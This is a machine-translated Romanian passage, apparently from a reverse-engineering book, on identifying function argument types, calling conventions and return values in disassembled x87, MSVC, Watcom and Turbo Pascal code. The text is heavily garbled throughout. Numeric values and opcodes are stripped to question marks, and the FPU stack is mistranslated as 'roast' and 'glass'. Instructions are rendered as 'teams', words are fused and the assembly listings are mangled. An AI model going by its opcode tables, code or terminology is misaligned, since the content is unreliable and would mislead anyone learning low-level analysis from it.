deint Este foarte dificil pentru programele moderne de programe, fără a cunoaște echipele de însoțire x consultăsuportă trei tipuri de date de date: un scurt pe de biți, pe de biți lung și extins pe de biți, corespunzătorurmătoarelor tipuri de limbaj C: Float, Double și Long Double Principalele informații despre tipurile de materiale aleacestor coprocesoare x sunt prezentate în tabel Tabelul Informații de bază despre tipurile de materiale decoprocesoare x Tipul de valori Tipuri preferate de transmisie float octeți ' , + Registre de procesor, CPUSTC, STC FPU Dubble Bytes UE' + CPU Registre, CPU cu fibre, CPU STACK, STACK FPU Long Double Bytes ' , + STACK CPU, STACK FPU Real Bytes x ’ze x* + Registre de procesor, Stack FPU Atenție!Standardul ANSI nu stipulează prezentarea exactă a tipurilor de date de mai sus, iar această afirmație esteadevărată doar pentru platforma PC și chiar și atunci pentru toate implementările tip de turbo-pascal ParteaIII Identificarea structurilor cheie ale limbilor de nivel înalt, argumentele plutitorului și dublu -double -doble-sole, poate fi transmisă funcțiilor în trei moduri diferite: prin registrele de scop general ale procesoruluiprincipal, prin stiva principală procesor și prin paharul coprocesorului Argumentele de tip dublu lung ar necesita preamulte registre generale pentru transferul lor, prin urmare, în marea majoritate a cazurilor, acestea sunt înscrise înpaharul principalului procesor sau însoțire Primele două metode de transmisie ne sunt deja familiare, dar a treia esteceva nou!Însoțirea x are opt registre de optzeci de ani desemnate de St ( ), St ( ), St ( ), St (H), St ( ), St ( ),St ( ) și St ( ) organizat în forma stivei de inele Aceasta înseamnă că majoritatea echipelor nu funcționează pe numerede registre, iar partea de sus a stivei este folosită ca receptor (sursă) De exemplu, pentru a adăuga două numere demateriale, mai întâi trebuie să le înjunghiați în paharul coprocesorului, apoi să apelați comanda de adăugare, rezumândcele două numere situate în partea de sus a stivei și returnând rezultatul acestora Lucrați din nou prin stivă Existăoportunitatea de a adăuga numărul întins în paharul însoțirii cu un număr situat în RAM, dar este imposibil să adăugațidirect două numere de la RAM!Astfel, prima etapă a operațiunilor cu tipuri de materiale este de a le aduce în paharulcoprocesorului Această operație este realizată de comenzi din seria FLDXX listată cu explicații scurte în tabel Înmarea majoritate a cazurilor, se folosește o instrucțiune FLD, un material care intră în stiva de RAM a unui procesorsau un registru de înregistrare Strict vorbind, aceasta nu este o echipă, o familie formată din patru echipe cu OPCODS xD x ?, OxDD x ?, OxDB x ?și xd OKSI, conceput pentru a descărca tipuri scurte, lungi, extinse și, respectiv,înregistrarea FPU Aici ?- Clarificarea câmpului vizat, operandul este localizat în registru sau memorie, iar i -indicele registrului FPU Lipsa de încărcare Numerele de materiale din registrele CPU își folosesc pentru a transmite argumente precum float, dublu sau lung În oricecaz, pentru a plasa aceste argumente în paharul coprocesorului, funcția numită va fi obligată să copieze conținutulregistrelor în RAM Îți place sau nu, nu vei scăpa de memoria ta De aceea, transmiterea registrului tipurilor demateriale este extrem de rară, iar în marea majoritate a cazurilor, ca argumentele obișnuite, sunt transmise prin stivaprincipală a procesorului sau prin paharul însoțirii Doar compilatoarele avansate, în special WATCOM, dar nu șiMicrosoft Visual C ++ și nu Borland C ++, cu toate acestea, unele valori „selectate”, pot fi încărcate și fără apeluride memorie, sunt notate pentru a transmite argumente prin paharul coprocesorului În special, există comenzi pentruîmpingerea contraatacului numerelor Zero, One, L și altele - lista completă este dată în tabel O caracteristicăcurioasă a însoțirii este susținerea operațiunilor cu calcule întregi Compilatorii nu folosesc această oportunitate, daraceastă tehnică se găsește uneori în inserțiile de asamblare, deci nu merită să neglijeze studiul echipelor întregi aleînsoțirii Tabelul Principalele echipe ale coprocesorului utilizate pentru a transfera/accepta comanda argumente înscopul FLD, sursa împinge numărul materialului de la sursă în partea de sus a FSTP de friptură de consum, receptorulîmpinge numărul material la receptorul FST Receptorul copiază materialul din partea de sus a stivei de însoțire cătrereceptorul FLDZ împinge zero la friptura superioară a consumul GPAV Identificarea funcțiilor funcțiilor Tabelul (END) Numirea FLD împinge un Unitatea din partea de sus a scăderii mai mari ale conssetorului FLDPI împingenumărul de TT FLDL T în partea de sus a consultărilor conssetului două logaritm de zece apăsuri fldl e fldlg în parteade sus a stivei de însoțire a logaritmului decimal al două apăsări FLDLN către însoțirea la însoțire În partea de sus astivei de însoțire a logaritmului natural de două foduri Sursa împinge numărul întreg de la sursă în partea de sus astiveiComparația pumnului pumnului completează un număr din partea de sus a cocesorului Stak la receptorul pumnului,receptorul împinge întregul număr din partea de sus a scăderii mari la receptorul FBLD Sursa împinge numărul zecimal dela receptor în partea de sus a vârfului friptura de consum FBSTP Receptorul copiază numărul zecimal din partea de sus astivei de însoțire până la recepționistul FXCH ST (Index) schimbul valorilor dintre partea de sus a fripturiicoprocesorului și tipurile de registru ST (Index) Double duble și lungi ocupă mai mult de un cuvânt al mașinii și sunttransmise prin stiva principală a procesorului pentru mai multe iterații Acest lucru duce la faptul că analiza coduluifuncției sfidătoare nu ne permite întotdeauna să setăm cantitatea și tipul de argumente transmise cauzate de funcțiacauzată Produsul este în studiul funcției funcției cauzate Întrucât însoțirea nu poate determina în mod independenttipul de operand localizat în memorie (adică el nu știe câte celule ocupă), o echipă „propria” este fixată în spatelefiecărui tip Sintaxa de asamblare ascunde aceste diferențe, permițând programatorului să se rezume de la complicațiileimplementării (și, de asemenea, spun că asamblatorul este un limbaj cu nivel scăzut) Prin urmare, puțini oameni știu căfadd [float] ifadd [DOABLE] - Există diferite instrucțiuni ale mașinii cu xd ?? ???și oxdc ???, respectiv Vestiproaste!Analiza listei DizAssemblery nu oferă informații despre tipurile de materiale, astfel încât pentru a obțineaceste informații, trebuie să mergeți la nivelul mașinii, mușcând în depozitele hexadecimale de instrucțiuni Întabel arată opcodele principalelor echipe ale însoțirii care lucrează cu memoria Vă rugăm să rețineți că, cuvalorile materiale de tip dublu lung, operațiunile matematice directe sunt imposibile - înainte de a fi încărcate înpaharul coprocesorului Tabelul Oppode ale principalelor echipe ale însoțirii Al doilea octet al opcodului esteprezentat sub formă binară Marcajul de întrebare denotă orice tip de comandă de biți scurt (float) lung (dublu) extins(dublu lung) FLD XD ?? ???Oxdd ?? ???Oxdb ?? ???Fstp xd ?? ???Oxdd ?? ???Oxdb ?? ???Fst xd ?? ???Oxdd ?? ???Fără fadd xd ?? ???Oxdc ?? ???Fără faddp oxde ?? ???Oxda ?? ???Fără fsub xd ? ???Oxdc ?? ???Fără fdiv xd ?? ???Oxdc ?? ???Fără fmul oxd* ?? ???OXDC ?? ???Fără fcom xd ?? ???OXDC ?? ???Fără FCOMP XD ?? ???OXDC ?? ???nr Partea a III -a Identificarea structurilor cheie ale limbilor de nivelridicat Observați despre tipurile materiale ale limbajului turbo pascal al limbajului C, datorită unei mașini-orientare, coincide cu tipurile de materiale ale însoțirii, care este logic principalul tip de material de material dematerial Turbo Pascal - real, ocupă octeți și este nefiresc pentru mașină, prin urmare, atunci când se calculează princalcule prin el este tradus programatic în tipul de extins (lung lung în termeni c) Acest lucru reduce semnificativperformanța, dar alte tipuri de construite -in construit Biblioteca matematică, concepută pentru a înlocui însoțirea,din păcate, nu acceptă În prezența unui însoțitor „viu”, tipuri de procesor pur procesor de unic, dublu, extins șicomor, corespunzătoare la plutitor, dublu, lung și lung și int Funcțiile unei biblioteci matematice care oferă suportpentru calcule cu un punct plutitor, argumentele materiale sunt transmise prin registre În AX, VX, DX, primul argumenteste plasat pe stânga, iar în Cx, Si, Di - a doua (dacă există) funcții sistemice ale interfeței cu interfațaprocesorului (în special, funcțiile de transformare reală în extins) Luați argumente prin registre, iar rezultatul estereturnat prin rezultatul paharului însoțirii În cele Biblioteca matematică construită (implicit), sau cu apelul directal comenzilor comandantului (cheie și $+) în primul caz în general, nu utilizează capacitățile însoțirii, chiar dacăeste instalată cu mașina în Al doilea caz, în prezența unui însoțitor, programul atribuie toate capacitățile de calculpe acesta, iar dacă însoțirea este absentă, atunci o încercare de a apela comenzile însoțitoare duce la generarea decătre principalul procesor de excludere a Int x Este „prins” cu emulatorul programatic - de fapt, aceeași bibliotecăconstruită de suport pentru calcule cu un punct plutitor, acum ne imaginăm cum are loc transmiterea argumentelormateriale și suntem nerăbdători să vedem cum „Live” se întâmplă Pentru început, luați în considerare exemplul banal datîn lista : Listarea , Demonstrați^Icee^ Funcțiile argumentelor materiale #include float myfunk(float a, dublu b) {#if definit watcomc ) #pragma aux myfunc parm [ ];// Compilează cu cheia - #Deif return a+b;)Main () {printf ("%f \ n", myfunk ( ));Rezultatul compilării acestui exemplu folosind Microsoft Visual C ++ artrebui să arate așa cum se arată în lista : Listarea J Rezultatul compilării funcției care demonstreazătransmisia funcției 'PROCUL PRINCIPAL C de xref: start+af^p var = qword ptr - ;Variabila locală, care, aparent, estede octeți Push EBP CPAVA Identificarea argumentelor funcțiilor MOVEBP, ESP;Deschide rama Stack Push f ah;Din păcate, Ida Pro nu își poate imagina un operand sub forma unui numărc;punctul de plutire În plus, nu avem cum să determinăm ce este;Este numărul materialului Tipul său poate & & ': ambeleint, cât și;Indicator (apropo, este foarte asemănător cu indicatorul) PUSH E AE H PUSH D EB H;Versiunea „Draft” aprototipului arată astfel: MyFunk (IntA, Int B, Int C) Sunați myfunk add esp, ;Un singur cuvânt al mașinii esteeliminat din stivă, în timp ce;Trei!Fstp [esp+ +var ];Strângem un număr material din friptura însoțirii La ;Aflațicare, va trebui să faceți clic pe + , să alegeți în deschis;Elementul de meniu „Reprezentarea textului” și înfereastra „Numărul” Opcode Bytes ”deschisă, indică cât de multă familiaritate este dată comenzii echipei ,;De exemplu, chiar acolo, la stânga FSTP, apare mașina sa;Prezentare - DD C Conform tabelului , determinăm tipul de date,C;pe care echipa operează Aceasta este dublă Prin urmare, funcția;A revenit la Conservatorul de însoțirea semnificațieimateriale ;Deoarece funcția returnează semnificațiile materiale, este foarte posibil ca acesta;Ei le acceptă caargumente Cu toate acestea, fără analiza myfunk;Această presupunere este imposibil de confirmat Push offset af,- "%f \n";Trimiteți funcțiile printf la indicator la linia de specificații;Când îl prescrieți pentru a obține un număr dematerial Dar în același timp, suntem el;Nu -l aduceți la Stack ?!Parcurgeți fereastra Dizassembler în sus;În paralelcu aceasta, luând în considerare toate modalitățile posibile de rezolvare a situației ;Luând în considerare cu atențiecomanda „FSTP [ESP+ +VAR ]”, vom încerca;Calculați unde pune rezultatul muncii sale ;IDA definit ѵag ca "QWORD PTR- ", prin urmare [ES+ - ];echivalent cu [esp], adică material Variabila este trasă drept;În vârful stivei Și ce este în vârf?Două argumente transferate;Myfunk și nu s -a împinsniciodată din stivă Ce compilator viclean nu este;a început să creeze o variabilă locală, dar a folosit argumentelefuncției;Pentru o stocare temporară a datelor apel pnntf adăugați esp, och;Împingem trei cuvinte de mașină de laStack Pop ebp retn principal endp myfunk proc C DE XREF: Sub + îp var = DWORD PTR - Partea III Identificarea structurilor cheie ale limbilor de nivel înalt arg o = DWORD PTR arg = QWORD PTR OCH;Neuităm - IDA a găsit doar două argumente, în timp ce funcțiile;Au fost transmise trei cuvinte ale mașinii!Este foarteasemănător că unul dintre argumente;ocupă octeți Pushh EBP Mov Ebp, ESP;Deschide rama Stack Push Ech;Nu, aceastanu este conservarea ECH - aceasta este o rezervare a memoriei pentru local;Variabila, deoarece se află în locul în carese află Esh păstrat;Variabilă ѵAG FLD (EBP+arg ]; Strângem variabila materială care se află în adresă; adresa [eir+ ](mai întâi din stânga argumentului) Pentru a afla tipul de acest lucru; variabilă, urmăriți opcodul instrucțiunilor FLD- D Da, D înseamnă; Float Se dovedește, primul argument este plutitor Fadd [ebp+arg ]; plianta tip arg plutitor cu al doilea tip din stânga tu; crezi că este că Mai întâi a fost float, apoi al doilea va fi și plutitor?;Și aici și nu neapărat! Ne uităm la Opcod - DC OS, ceea ce înseamnă cel de -al doilea; argumentul are tipul de dubluși nu float! fst [ Ebp+var ]; copiați valoarea din partea de sus a stivei de însoțire; (există rezultatul adăugării)într -o variabilă locală ѵag ; De ce? Ei bine dacă nu este niciodată, dacă ar fi necesară? Float a, Dublu b);mișcare esp, ebp pop ebp; închideți cadrul fripturii Retn myfunk endp, deoarece rezultatul compilării PRAm un exemplufolosind Borland C ++ L este practic identic cu rezultatul obținut folosind Microsoft Visual C ++ x, nu vom pierdetimp pe el și trecem imediat la analiza rezultatelor compilărilor folosind Watcom C (Lista ) Ca întotdeauna -Watcom are ceva de învățat Escilând J Rezultatul compilării exemplului care demonstrează transmiterea funcțiilorgăurilor • = argumente militare folosind watcom cu main proc aproape C de xref: cmain+ îp var = qword ptr- ;Variabilă locală pe octeți PUSH H CAPITOLUL Identificarea argumentelor funcțiilor Apelați SNK;Verificarea stivei pentru revărsare FLD DS:DBL ;Aruncăm un tip variabil de dublu în partea de sus a însoțirii ,;încărcat din segmentul de date ;Tipul devariabilă a determinat cu succes IDA în sine, transportându -l cu un prefix;'Dbl' a dacă nu aș fi hotărât, atunci ne -amfi întors;La opcod -ul echipei FLD FLD DS: FLT ;Aruncăm un tip variabil float în partea de sus a însoțirii SunăMyfunk;Numim myfunk cu transmiterea a două argumente prin paharul coprocesorului;Deci, prototipul ei arată astfel:myfuncfloat a, dublu b) Sub esp, ;Rezervăm un loc pentru o dimensiune variabilă locală de octeți Fstp[esp+ +var ];Strângem tipul de material dublu din partea de sus a stivei;(Tipul este determinat de dimensiuneavariabilei) Push Offset UK Apelați printf ;Da, deja familiar pentru noi, transmiterea funcțiilor ѵAG printf'adaugă esp, och retn main endp myfunk proc aproape C de xref: main + îp var c = qword ptr -ch var = dword ptr- ;Ida a găsit două variabile locale PUSH H CALL CHK Sub esp, Och;Rezervăm un loc pentru variabile locale Fstp[esp+ ch+var ];Strângem valoarea materială a tipului de plutitor din partea de sus a însoțirii;(Așa cum ne amintim, afost listată acolo ultima) ;Cu toate acestea, în caz, vă puteți asigura acest lucru, uitându -vă la opdod;Comenzi FSTP -D C Ei bine, unul, xd , apoi plutit exact Fstp [esp+ ch+var c];Strângem valoarea materială a tipului dublu dinpartea de sus a FPU;(Așa cum ne amintim, a fost adus acolo în fața plutitorului) ;Doar în caz, ne asigurăm de acestlucru, privind opourul echipei FSTP ;Deci este - DD C OXDD - Deoarece Oxdd, înseamnă, într -adevăr, dublu FLD[ESP+ CH+VAR ] Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Ne tragemplutitorul înapoi în partea de sus a stivei și Fadd [esp+och+var c];Îndoiți -l cu dublul nostru Aici și ei spun, deasemenea, că watcom c -;Optimizarea compilatorului!Este dificil să fii de acord cu acest lucru, deoarece compilatorul;Elnu știe că suma nu se schimbă din rearanjarea termenilor!Adăugați ESP, OCH;Eliberăm memoria alocată anterior pentruvariabile locale Retn myfunk endp dbl dq ;DATE XREF: Main +ATR FLT DD ;DATE XREF: Compitarea Main -Rloor a compilatorului Turbo Pascal pentru Windows Să recrutăm în editorul de text unexemplu dat în lista !Listare ^„ * * demonstrații„ Ireedachi peșteri ^NTZIH Valori de compilatorul tcgoo Pascal- folosește Wincrt;Procedura MyProc (A: Real),- începe Writeln (a);Sfârşit;Var a: real;B: Real;Începe A: = , ;B: = , ;MyProc (A+B);Sfârşit L Acum îl vom compila fără a susține însoțirea (se întâmplă cu setările implicite) Rezultatulcompilării este prezentat în lista • Listarea , rezultatul compilării unui exemplu din lista ; V fărăsuport pentru însoțirea programului Proc de program aproape de apel inittask Call @ systemlnit $ qv;Systemlnit(void);Inițializarea modulului de sistem Sunați @ wincrtinit $ qv;Wincrtinit (void);Inițializarea modulului WINCRT PushBP Mov BP, SP;Deschide rama Stack GPAVA Identificarea funcțiilor de Hog AH, AH CALL @ Stackcheck $Q word;Verificare de preaplin a stivei (AX);Verificăm dacă nu există octeți gratuite în stivă Mov word , c h movword , b h mov word , eh;Inițializați variabila de tip real Că acest lucru este real deocamdată ,;Desigur,știm doar din textul original al programului Vizual;Este imposibil să distingem această serie de echipe de treivariabile ale tipului de cuvânt Mov word , d h mov word , d ah mov word a, a h;Inițializăm o altăvariabilă precum Real MOV AX, Word MOV BX, Word MOV DX, Word MOV CX, Word MOV SI, Word MOV DI,Word A;Transmitem două variabile precum Real Call @$ Brplu $ q Rrealtl prin registre;Real (ax: bx: dx)+-real (cx: si:di);Din fericire, IDA a „recunoscut” în această funcție procesorul de adăugare și chiar;Prototipul ne -adeterminat ;Fără ajutorul ei, cu greu am reușit să înțelegem ce face acesta foarte mult;Funcție lungă și confuză Push DXPush BX Push Ax;Transmitem valoarea subliniată a procedurii Murgos prin stivă;Prin urmare, prototipul său arată astfel:AOPEPROC (A: REAL) Sunați Murgos Pop BP;Închideți rama lui Stack Hog ah, ah apel @halt $ q word;Opriți(cuvânt);Întrerupe execuția programului Program Endp Murgos Proc în apropiere C de xref: program+ cîp arg = word ptr arg = word ptr arg = word ptr ;Trei argumente transferate de procedură, așa cum am aflat deja, de fapt;Sunt trei„felii” ale unui argument precum Real PARTEA III Identificarea structurilor cheie ale limbilor de nivel înaltîmpinge BP MOV BP, SP;Deschide rama Stack Xor Ax, Ax Apel @ StackChet $ Q word;Verificare de preaplin a stivei(AX);Există un site în stivă?mov di, offse unk împinge ds push di;Turnați indicatorul în sticlă în tampon pentru aieși linia apăsați [bp+arg ] apăsați [bp+arg ] push [bp+arg ];Împingem toate cele trei argumente primite în stivă Movtox, llh ax de apăsare;Lățimea producției este de caractere Mov tox, offffh ax;Numărul de puncte după o decorare estemaxim Sunați @Write $ qm Text raloraloral wordt , Writefvar f, v: real;Lățime, zecimale: cuvânt);Afișăm numărulmaterialului la bufferul UNK Sunați @Writeln $ qm Text;Writeln (var f: text);Afișăm o linie din tampon peecran Sunați @ ocheck $ qv;Ieșiți dacă eroare pop bp retn myproc endp și acum, folosind cheia / $ n+, vom folosicomenzile coprocesorului și vom vedea cum va afecta codul (listarea ) ;Lista Rezultatul compilării exempluluidin listarea cu suport pentru însoțirea programului Proc în apropierea apelului inittAsk Call @Systemlnit $qv);Systemlnit (void);Inițializați modulul de sistem Sunați @ inițiam $ qv;Inițializează emulatorul software;Vomfolosi emulatorul de însoțire Sunați @ wincrtinit $ qv;Wincrtinit (void);Inițializați modulul WINCRT Push BP Capitolul Identificarea argumentelor funcțiilor MOV BP, SP;Deschide rama Stack Hogah, ah sunați @ stackcheck $ $ q word;Verificare de preaplin a stivei (AX);Verificarea stivei pentru revărsare Movword c , ec h mov word c , b h mov word c , eh mov word c , d h mov word c , d h mov word ca, a h;Până acum nu putem determina tipul de variabile inițializate ;Poate fi cuvânt și real egal cu succesul Mov ax,word c mov bx, word c mov dx, word c apel @extended $ q real;Convertiți real în extins;Și acum transferimfuncții Word c , Word c și Word c ;transformarea reală în extindet cu încărcarea acestuia din urmă în paharulcoprocesorului;Deci, Word c - Word c este o variabilă ca reală MOV AX, Word C MOV BX, Word C MOV DX,Word CA Apel @Extended $ q real;Convertiți real în extins;În mod similar - word c - word ca - un tip variabilreal Aștepta;Așteptăm ca însoțirea să -și termine munca Faddp St ( ), St;Îndoiți două numere numenate situate pe parteade sus a stivei;Însoțirea, menținând în același timp rezultatul în aceeași stivă Sunați @Real $ Q extended;Convertițiextins în reală;Ne transformăm extins în reală;Argumentul este transmis prin paharul coprocesorului și este returnatla;Registle AX VX DX Push DX Push BX Push Ax;Registrele AX, BX și DX conțin valoarea tipului real;Prin urmare,prototipul procedurii arată astfel :;Murgos (A: Real);Apelați Murgos Pop BP Xor Ax, AX Call @Halt $ Q word;Halt (Word)Program Endp Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat MyProc Proc în apropiere;Codxref: program+ dîp arg = word ptr arg = word ptr arg = word ptr ;După cum ne amintim deja, aceste treiargumente sunt de fapt;Un argument ca real Push BP Mov BP, SP;Deschide rama Stack Xor Ax, AX Call @ StackChet $Q word;Verificare de preaplin a stivei (AX);Verificarea stivei pentru revărsare mov di, offset unk împinge ds pushdi;Aducem un pointer în sticlă în tampon pentru a ieși linia Mov ax, [bp+arg ] mov bx, [bp+arg ] mov dx, [bp+arg ]apel @extended $ q real;Convertiți real în extins;Transformăm real în extinde AX MOV, H PUSH AX;Lățimea de ieșire este x semne Mov tox, offffh ax;Numărul de semne după un decimalum este tot ceea ce este și retrage totul Apelați @Write $qm Text extended wordtl;Scrie (var f; v: extins {st ( ); lățime zecimals: cuvânt);Ieșirea numărului de material de lafriptura coprocesorului la tampon Sunați @Writeln $ qm Text;Writeln (var f: text);Liniile de imprimare din tampon Sunați@ ocheck $ qv;Ieșiți dacă eroare pop BP Retn MyProc Endp Apeluri ale acestui Call și un acord privind apelurileimplicite în programele scrise pe C ++, fiecare funcție obiect este acceptată implicit de acest argument - un pointer lao instanță a obiectului din care funcția se numește Mai multe despre acest lucru au fost deja descrise în capitolul ,„identificarea acestui lucru” Capitolul Identificarea argumentelor funcțiilor În mod implicit, toate compilatoarele C ++ binecunoscute folosesc acordul de apel combinat, transmisând argumente evidente prin stivă (cu excepția cazului în carefuncția este declarată ca FastCall), iar aceasta cu cel mai mare cu cea mai mare Preferință (a se vedea tabelul - - ) Acordurile CDECL și STDCALL sunt prescrise pentru a transfera toate argumentele prin stivă, inclusivargumentul implicit al acestui lucru, care este listat în stivă, după toate argumentele evidente (cu alte cuvinte,acesta este cel mai stânga argument) Luați în considerare un exemplu dat în lista Lista Demonstrareatransmiterii argumentului implicit - thiis #include clasa myclass {public: void demo (int a);// Demo Prototipîn realitate arată astfel: Demo (aceasta, int a) Void stdcall demo (int a, int b);// Prototip Demo arată de fapt:II DEMO (aceasta, int a, int b) Void cdecl DEMO (INTA, INT B, INT C);// prototip Demo arată de fapt: // DEMO (aceasta, int a, int b, int c) };// Implementarea Demo, Demo , Demo Funcții pentru a economisi spațiu Main (){myclass *zzz = new myclass;Zzz-> demo ();Zzz-> demo ();Zzz-> demo ();} Rezultatul compilării acestui exempluMicrosoft Visual Visual C ++ ar trebui să arate așa cum se arată în lista (este prezentată doar funcțiaprincipală, orice altceva nu este de interes în acest moment) ;Listarea , un fragment dintr -un codapaper Dizalmblede la listarea Z PROC PRIN Cod xref: start+af^p pushh esi;Salvăm ESI în stivă Apăsați apel? @yapaxi@z;Operatornou (UINT);Subliniem un site pentru un obiect al unui obiect Mov Esi, eah;ESI conține un indicator către o instanță aobiectului Adăugați ESP, Partea a III -a Identificarea structurilor cheie ale limbilor de nivelridicat;Turnați argumentul din stivă Mov Esh, ESI;Prin ECH, funcția demo este transmisă de acest indicator ;După cum neamintim, compilatorul Microsoft Visual C ++ folosește Registrul ECH;pentru a transmite chiar primul argument alfuncției ;În acest caz, acest argument este indicatorul acestui lucru ;Un compilator Borland C ++ x ar transmite acestlucru prin registrul EAH, deoarece;El îi oferă cea mai mare preferință (vezi Tabelul ) Împinge ;Aducem un argumentclar al funcției în stivă Deci, acest lucru nu este FastCall-;O funcție, altfel, acest argument a fost plasat înregistrul EDX Se dovedește;Avem de -a face cu tipul de apel implicit Apelați Demo Push ;Turnați primul argument dindreapta din dreapta Împinge ;Turnăm argumentul la al doilea din dreapta din dreapta Împinge ESI;Turnăm argumentulimplicit în acest pahar ; O astfel de schemă de transmisie sugerează că există un loc clar;Transformarea tipului de funcție în stdcall saucdecl Derularea ecranului;Dizassembler este ușor în jos, vedem că stiva curăță apelul;Funcția, care înseamnă că respectăacordul STDCALL Apelați Demo Push Push Push Push ESI Call Sub Adăugare ESP, LOH;Deoarece funcția curățăstiva în sine, atunci are fie un tip de software;implicit, sau - CDecl Transmiterea indicatorului acesta prinstivă;sugerează că a doua presupunere este cu adevărat Hog Eah, EAX POP ESI Retn Main Endp argumente implicit Pentru asimplifica apelul funcțiilor cu „dansul rotund” al argumentelor din C ++, a fost introdusă posibilitatea de a setaargumente implicit De aici apare întrebarea-este apelul funcțiilor cu argumentele în mod implicit din funcțiileobișnuite care diferă în orice?Și cine inițializează argumentele reduse - funcția cauzată sau cauzată?Deci, atunci cândprovoacă funcții cu argumente implicite, compilatorul adaugă în mod independent argumentele lipsă, iar apelul uneiastfel de funcții nu este diferit de apelarea funcțiilor obișnuite Capitolul Identificarea argumentelor funcțiilor Vom demonstra acest lucru folosind un exemplu dat în lista Demonstrarea argumentelor implicite ♦ include myfunchțint a = l, int b = , int c = ) {printf (" %x %x \ n", a, b, c);} Main () {myfunk ();Rezultatulcompilării sale va arăta aproximativ așa cum se arată în lista (este arătată doar o funcție sfidătoare pentru aeconomisi spațiu) Principalul proc aproape;Cod xref: start+af> lp pushh ebp mov ebp, esp push push push ;După cumputeți vedea, toate argumentele obținute au fost transmise funcțiilor;Compilatorul în sine Sunați MyFunk Add ESP, OCHPOP EBP Retn Tehnica principală Endp pentru studiul învățării transmisiei argumentelor de către un compilator necunoscutO mare varietate de compilatoare existente și aspectul constant al celor noi nu permit să aducă aici o masăcuprinzătoare, care este pictată Natura fiecărui compilator Ce se întâmplă dacă întâlniți un program, compilat de uncompilator care nu este aprins în această carte?Dacă compilatorul poate fi identificat (de exemplu, folosind DA RGO saupe liniile de text conținute în fișier), rămâne doar pentru a obține copia și a conduce prin aceasta o serie de exemplede testare cu transmiterea funcției studiate de diferite tipuri Este util să studiem documentația atașatăcompilatorului, deoarece este foarte posibil ca toate mecanismele de transmitere a argumentelor susținute de el să fiecel puțin pe scurt descrise acolo Mai rău, atunci când compilatorul nu este recunoscut sau nu există nicio modalitate dea obține o copie Atunci va trebui să investigați cu atenție și cu atenție interacțiunea funcțiilor cauzate șisfidătoare Capitolul Identificarea valorii returnate de funcție în mod tradițional de „sensul returnat” esteînțeleasă ca valoarea returnată de operatorul de retur, dar aceasta este doar partea de suprafață a aisbergului care nudezvăluie întreaga imagine a interacțiunii funcțiilor unul cu altul Ca demonstrație vizuală, considerăm un exempludestul de tipic, apropo, împrumutat din codul real al programului (listarea ) 'Listarea Demonstrarea returnăriivalorii în argumentul transmis de legătura int xdiv (int a, int b, int *c = ) {if (! B) return - ;dacă (c) c [ ] = a %b;Returnează A / B;} Funcția XDIV returnează rezultatul diviziunii întregi a argumentului în argument, dar, în plus,înregistrează restul diviziei în variabila C, transferată la link Deci, câte valori a revenit funcția?Și care esteîntoarcerea rezultatului prin legătura mai rău sau „ilegal” a revenirii clasice?Publicațiile populare tind să simplificeproblema identificării valorii returnate de funcție, având în vedere doar un caz special cu operatorul de retur Înspecial, asta este ceea ce Matt Pittrek în cartea sa „Secretele programării sistemului în Windows ”, cu toate acestea,alte metode rămân „în spatele scenei” Următoarele mecanisme vor fi luate în considerare în acest capitol: □ Returnareavalorii de către operatorul de retur (prin registrele sau paharul coprocesorului) □ Returnarea valorilor prin argumentetransferate de link □ Returnarea valorilor prin memorie dinamică (Bunch) □ Returnarea valorilor prin variabile globale □Întoarcerea valorilor prin steagurile procesorului De fapt, nota nu ar împiedica această listă să adauge și să returnezevalorile prin disc și fișiere proiectate în memorie, dar acest lucru depășește domeniul de aplicare al subiectuluidiscutat, deși, considerând funcția ca o „casetă neagră”, nu se poate face altceva decât Recunoașteți că afișarearezultatelor lucrării sale în fișier, de fapt, există o valoare de Matt Pitrek returnat de acesta „Secreteleprogramării sistemului în Windows ” - K Dialectics, GPAVA Identificarea valorii returnate de funcția Returnare de retur de către operatorul de retur printr -un acord general acceptat, valoarea returnată este plasată înoperatorul de returnare în Registrul EAC (în AH în compilatoare de biți), iar dacă acest lucru nu este suficient, atunci cele de biți mai vechi aioperandului sunt plasate în EDX (într-un mod de biți, cuvântul mai vechi este plasat în DX) Tipurile de date de dateîn majoritatea cazurilor sunt returnate prin paharul coprocesorului, mai rar prin EDX: EAX (dx -ax în modul pe biți) Și cum se întorc tipurile care ocupă mai mult de octeți?Să spunem că o anumită funcție returnează o structurăformată din sute de octeți sau un obiect de dimensiuni nu mai puțin Nici unul, nici celălalt nu este împins în registre,aici chiar și friptura însoțirii nu va fi suficientă!Se dovedește că, dacă valoarea returnată nu poate fi stoarsă înregistre, compilatorul ascuns de programator transmite funcția unui argument implicit - o legătură către o variabilălocală, în care este înregistrat rezultatul returnat Astfel, funcțiile structurii MyStuct myfunk (IntA, int b) și voidmyfunch (struct mystryct *my, int a, int b) sunt compilate în cod identic (sau aproape de acest lucru) și „scoateți” dinCodul mașinii Un prototip autentic este imposibil!Singurul indiciu este dat de compilatorul Microsoft Visual C ++, care,în acest caz, returnează indicatorul la variabila returnată, adică prototipul restaurat arată aproximativ astfel: structmystruct* myfunk (struct mystruct* tu, inta, int, int B) De acord, este oarecum ciudat ca programatorul din mintea lordreaptă să întoarcă indicatorul la argument, care tocmai a predat funcțiile cu propriile sale mâini?Compilatorul BorlandC ++ din această situație returnează tipul de gol, ștergând diferența dintre argumentul returnat de valoare șiargumentul returnat la link Cu toate acestea, incapacitatea de a restabili un prototip autentic nu ar trebui să sesupere Mai degrabă, dimpotrivă!„Adevăratul prototip” susține că rezultatul funcției funcției este returnat prin sens,dar în realitate este returnat de link!Atunci de ce atunci chemați o pisică cu un mouse?Câteva cuvinte despredeterminarea tipului de valoare returnată Dacă funcția de la ieșire se potrivește clar registrul EAX sau EDX (AH și DXîntr-un mod de biți), atunci tipul său poate fi determinat de tabel și Dacă funcția lasă aceste registrevagi, atunci tipul de gol se întoarce cel mai probabil, adică nimic Analiza funcției sfidătoare ajută la clarificareainformațiilor, sau mai bine zis, modul în care tratează registrele EAX [EDX] (AX [DX] în modul pe biți) De exemplu,tipurile de char sunt caracterizate fie de jumătatea mai tânără a Registrului EAX (AH) - Registrul AL, fie de zeroulocteților seniori cu logic și Este logic să presupunem: dacă funcția de apel nu folosește valorile lăsate de funcția înregistrele EAC [EDX], tipul său de tip Dar această presupunere este incorectă Adesea, programatorii ignoră valoareareturnată, înșelătorând astfel cercetătorii Tabelul Mecanismul de returnare a valorii la operatorul de retur încompilatoare de biți tip tip returnare un singur byat al i ah ax cu două byt cu patru golfuri dx: ax real dx: bx: axfloat dx: ax |Pointer de război ax Far Pointer Doc: Axa de mai mult de patru octeți 